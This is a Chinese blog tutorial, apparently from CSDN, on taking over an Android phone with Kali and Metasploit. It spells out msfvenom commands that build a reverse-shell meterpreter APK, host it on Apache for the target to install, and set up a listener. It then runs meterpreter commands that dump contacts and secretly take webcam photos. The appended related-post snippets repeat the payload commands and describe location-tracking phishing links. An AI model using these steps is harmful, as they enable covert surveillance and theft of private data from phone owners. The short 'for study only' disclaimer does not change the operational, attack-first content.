kali 使用后台进行手机拍照,查看定位,获取信息,(通讯录等操作)

已于 2024-01-05 11:56:04 修改
阅读量2k 收藏 44
点赞数 20
文章标签: 智能手机 android web安全 安全 安全架构 系统安全 网络安全
于 2023-12-28 19:24:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jennycisp/article/details/135276378
版权
控制安卓手机拍照,查看定位,获取通信录
  • 引言
  • 准备工作
    • 1. kali、手机
    • 2.戴上眼睛注意别敲错命令,复制的时候注意看!
  • 开始了!!!
    • First
    • Second

引言

** 大家好,我是嘉哥,今天我来教会大家一个入侵安卓手机控制手机拍照,查看定位,获取通信录,查看手机内容。 本作品只适用于老版本安卓,文章只作为研讨技术,不得非法使用
首先准备工具 **

准备工作

1. kali、手机

只需要大家准备kali操作系统以及一部手机就好。若是大家做过程中遇到问题,欢迎留言交流

2.戴上眼睛注意别敲错命令,复制的时候注意看!

开始了!!!

First

1. 打开kali 进入终端:
2. 第一生成宿主程序Test.apk

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.0.46 LPORT=8888 R > Test.apk

成功后如截图所示:
成功后如截图所示

注意 LHOST是你自己的kali的ip怎么查看自己kali的是以下命令 端口LPRT你自己写

ifconfig

2.将其移动到apache2服务器目录下并启动apache2服务器

cp Test.apk /var/www/html
service apache2 start

成功后如截图所示:
成功后如截图所示
注意 需要管理员root下 否则输入sudo cp Test.apk /var/www/html 输入密码的时候不会回显

sudo cp Test.apk /var/www/html

Second

如果你是第一次使用apache2服务器,则需要修改文件

vi /var/www/html/index.html

找到以下图片需要增加一行代码,红色框框出来了别改错否则回去重新看一下。
增加一行时可以使用 i 切换到输入状态,否则你是写不上东西的,输入错了,可以输入**:q!不保存退出,输对了保存退出时同样的:wq**保存并退出;
效果
这时候手机输入你kali的ip就能访问下载这个apk文件了。

点download就能下载了
下载好在手机上安装,要是访问不了,请在评论区联系我!!!
接下来安装好不用打开,再kali上设置监听:

输入msfconsole

msfconsole

打开该框架
然后继续
设置监听

use multi/handlerr

设置载荷 和之前一样,别弄错了

set payload android/meterpreter/reverse_tcp


show options

查看到需要设置以下参数
设置参数

set LHOST 10.0.0.46
set LPORT 8888

和你ip一样,端口和之前一样

输入run执行起来
run
首先查看系统信息
在这里插入图片描述

再查看安装app文件
在这里插入图片描述

查看手机通信录
dump_contacts
查看手机通信录
在这里插入图片描述

在这里插入图片描述

查看手机拍张照
webcam_snap
这里就不用给大家看拍的是什么了吧!!!
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

网络安全学习资源分享:

最后给大家分享我自己学习的一份全套的网络安全学习资料,希望对想学习 网络安全的小伙伴们有帮助!

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

【点击免费领取】CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》

1.学习路线图

在这里插入图片描述

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。【点击领取视频教程】

在这里插入图片描述

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取技术文档】

在这里插入图片描述

(都打包成一块的了,不能一一展开,总共300多集)

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取书籍】

在这里插入图片描述

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

在这里插入图片描述

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

颜若御
关注
Kali使用完整的手册
05-13
Kali使用完整的手册
使用 Kali Linux 跟踪任何设备位置
weixin_51387754的博客
08-13 5651
标题如果您的手机在某处丢失或被某人偷走了,您可以使用此技巧, 或者如果您的兄弟姐妹/朋友/家人失踪并使用他们的电话,那么您可以使用此技巧来定位并找到他们, 本视频仅用于教育目的,请不要做错事。 这里是软件链接 NGROK - https://ngrok.com/ SEEKER - https://github.com/thewhiteh4t/seeker 视频链接https://www.youtube.com/watch?v=DonZ63aVDK4&t=307s 手机电脑可上外网,kali虚拟机20
Kali Linux利用MSF入侵安卓手机(零基础版超详细)
m0_74914256的博客
05-05 2万+
Kali Linux利用MSF入侵安卓手机新手下白版最详细,查看对方手机系统信息,查看对方手机安装哪些app文件,远程控制对方手机拍摄一张照片,远程控制对方手机开起视频聊天,实时查看对方手机的信息,获取对方手机通讯录,实时获取对方手机GPS定位
kali生成后门远程控制电脑或手机
wutiangui的博客
05-07 3856
问题:Metasploit渗透测试中出的错误 Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).点击.exe文件直接运行安装,运行,下一步,直接完成安装。Android模拟器(靶机1):192.168.0.106。2.1首先从官网上下载模拟器雷电地址点击打开链接。靶机:192.168.25.106。二、环境配置二Android模拟器。
kali精准定位地理位置
QQ670663的博客
01-17 2万+
一、GPS简介 物理位置定位:根据IP的定位不准确,容易被欺骗,网上有很多IP伪造技术,所以定位肯定也不准确。 GPS全球定位系统:(使用最广泛) GPS是英文Global Positioning System(全球定位系统)的简称。GPS起始于1958年美国军方的一个项目,1964年投入使用。 全球定位系统,大家比较熟悉的就是GPS。除了美国以外,世界其他经济体也有自己的定位系统比如:欧州-伽利略,俄罗斯-格洛纳斯,中国-北斗导航 民用用途:地址勘探,航空航海定位手机设备都支持定位服务很多网站,
kali-获取用户信息
LuckySec
05-13 3691
收集姓名和电子邮件 theharvester工具,可以搜索电子邮件地址、主机以及子域名站点等。 可选命令参数如下: -D:要搜索的域或公司名称 -B:数据来源:google,googlecse,bing,bingapi,pgp,linkedin, 谷歌简介、拼图、Twitter、GooglePlus、所有 -S:从结果编号X开始(默认值:0) -v:通过DNS解析验证主机名并搜索虚拟主机 ...
kali使用手册英文版
06-04
本文将主要围绕Kali Linux操作系统本身的特点和用途进行详尽的知识点梳理,不涉及具体的攻击和防护工具使用。 首先,Kali Linux的起源和历史与其前身BackTrack有着密切的关系。BackTrack是早期的一个热门的安全测试...
kali20.1更新源的相关操作
01-20
kali20.1更新源的相关操作 1.先进入更新源的文件(如果是root权限,则不用在前面加上sudo): sudo vim /etc/apt/sources.list 在password后面输入自己的密码即可: 2.在文件后面加上以下更新源,可根据自己需要进行...
kali linux 系统版本的查看方法
09-14
通过上述方法,我们可以快速准确地获取Kali Linux的操作系统版本和内核版本信息。这对于确保系统的安全性、及时更新补丁以及进行兼容性测试等方面都是非常有帮助的。希望这些方法能对您在使用Kali Linux时提供一定的...
Kali Linux系统使用基础教程.pdf
11-29
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的...
kali控制安卓(拍照通讯录、GPS等)
weixin_45511599的博客
10-06 1万+
1.生成apk(目标手机安装) msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.176 LPORT=8888 R > tst.apk 注意:ip地址是kali的,不是目标手机的 2.开启kali自带的web服务器 sudo service apache2 start 3.将apk拷贝到服务器根目录 sudo cp tst.apk /var/www/html 4.目标手机下载安装txt.apk 方法一:目标手机直接在网址
Kali网安实验一
Mask__er的博客
11-07 1376
Kali渗透实验一 文章目录Kali渗透实验一一、被动扫描1.1 搜索麻省理工学院网站PDF格式带有关键词“network security”1.2 照片中的女生在哪里旅行?1.3 手机位置定位1.4 base64解码1.51.5.1 内网中捕获到一个以太帧,源MAC地址为:98-CA-33-02-27-B5;目的IP地址为:202.193.64.341.5.2 IP地址的查询二、主动扫描2.1 利用NMAP扫描Metasploitable2(需下载虚拟机镜像)的端口开放情况。2.2 利用NMAP扫描Met
kali使用seek追踪定位IP地址(渗透笔记)
最新发布
weixin_43899811的博客
11-27 2452
在整个实验中,最头疼最无语的还是一开始kali版本选择上的问题,一定要选择kali2023,并且在清华大学镜像源中下载镜像。作为攻击者,我认为这种攻击方式还需要再进一步完善社工方面的问题,例如如何实现手机不提示开启位置功能,如何实现苹果端显示位置,如何不提示该网址是伪装网址等等,值得我们考虑和深思。作为被攻击者,我们一定在日常使用互联网中,不要随意打开陌生链接!那么最后,着重强调:此篇文章仅供技术交流和探讨,严禁利用该手段进行违法行为,出现一切问题后果自负!不足之处敬请批评指正!
kali获取高精度的定位
我的学习笔记
09-10 1万+
参考:https://github.com/thewhiteh4t/seeker 操作案例:https://asciinema.org/a/195052 可以高精度的定位设备所在位置;但需要可以访问到谷歌地图;
kali找人
undefine
12-18 3171
下面将在kali演示使用seeker和ngrok配合获取点击链接设备的位置,切勿用于非法用途 工具提供 链接:https://pan.baidu.com/s/1Ltj_FTfznDT1C5irVGyXEg 提取码:jing 需要用到两个工具,一个是用来获取对方位置信息的工具,名为seeker 一个是用来进行反向代理的工具,因为kali在内网所以需要反向代理才能让两个内网的用户链接,名为ngrok 可以去github下载seeker https://github.com/thewhiteh4...
追踪电脑或手机(已知目标IP或mac)进行物理定位
热门推荐
我的学习笔记
02-28 3万+
仅供学习娱乐测试。iplocator.pl代码:#!/usr/bin/perl # Ip Geolocation #By Alexcerus # Demo : https://www.youtube.com/watch?v=0Eq3d10LQ8c # # API documentation - http://ip-api.com/docs/ # you...
利用kail工具进行信息收集
m0_68653650的博客
06-15 2992
攻击者通过控制了大量的计算机或者IoT设备的方式,通过向目标发送大量的请求或者无意义的数据包,使得目标系统的处理能力、内存、网络带宽等资源都被耗尽,从而导致目标服务器无法正常响应其它用户的请求。信息收集对于渗透来说是非常重要的一步,收集的信息越详细对以后渗透测试的影响越大,信息的收集决定着渗透的成功与否。欺骗是指用假冒的身份或信息欺骗受害者,使其做出错误的决策。在对一台主机进行渗透时,服务的版本是很有必要搞清楚的,当知道了服务版本以后,就可以去判断该版本的服务存在哪些漏洞,从而尝试利用该漏洞。
Kali Linux Windows渗透教程从0到解决思路。
sunwanfulove的博客
09-22 2331
Kali Linux Windows渗透教程从0到解决思路成为安全工程师必备技能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

颜若御

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值